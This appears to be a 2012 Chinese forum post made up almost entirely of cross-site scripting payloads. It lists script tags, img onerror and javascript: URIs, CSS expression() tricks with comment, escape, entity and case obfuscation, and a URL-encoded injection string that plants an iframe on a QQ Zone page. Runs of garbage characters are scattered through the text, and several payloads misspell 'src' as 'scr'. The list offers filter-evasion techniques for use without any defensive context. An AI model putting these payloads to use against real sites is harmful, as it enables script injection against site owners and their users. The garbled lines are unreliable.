<script>alert("跨站")</script> (最常用)/ N( D9 l& C1 d1 K6 f
<img scr=javascript:alert("跨站")></img>( w. [& S# t) D
<img scr="javascript: alert(/跨站/)></img>
3 T/ Z# Q* x ?4 W) r5 n m<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)0 E: _! ^, v( g* |* E3 m
<img scr="#" onerror=alert(/跨站/)></img># [; P7 V- P/ b) ? t" {5 w7 u( y
<img scr="#" style="xss:expression(alert(/xss/));"></img>/ G9 n/ n1 H4 T: t8 |+ p" ?
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释). D- \% S6 t- A& o" ]
<img src=vbscript:msgbox ("xss")></img>3 y) G. e2 m* z
<style> input {left:expression (alert('xss'))}</style>
- G) a! e2 U, ~ ~* c9 C C0 N<div style={left:expression (alert('xss'))}></div>
6 j4 J4 L! N$ P7 ~# |0 U" A<div style={left:exp/* */ression (alert('xss'))}></div>( Q `9 X! K8 }2 T4 u: W C
<div style={left:\0065\0078ression (alert('xss'))}></div>
( h9 h+ Z7 z+ m9 I ]html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
( G0 A8 p7 I/ ~unicode <div style="{left:expRessioN (alert('xss'))}">7 ]5 u, c8 Q( q
9 N- \9 `7 e/ A1 c7 r* r* ^7 u
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
8 f% Q( j2 W2 j, V |
发表于 2012-9-13 17:15:04
收藏
支持
反对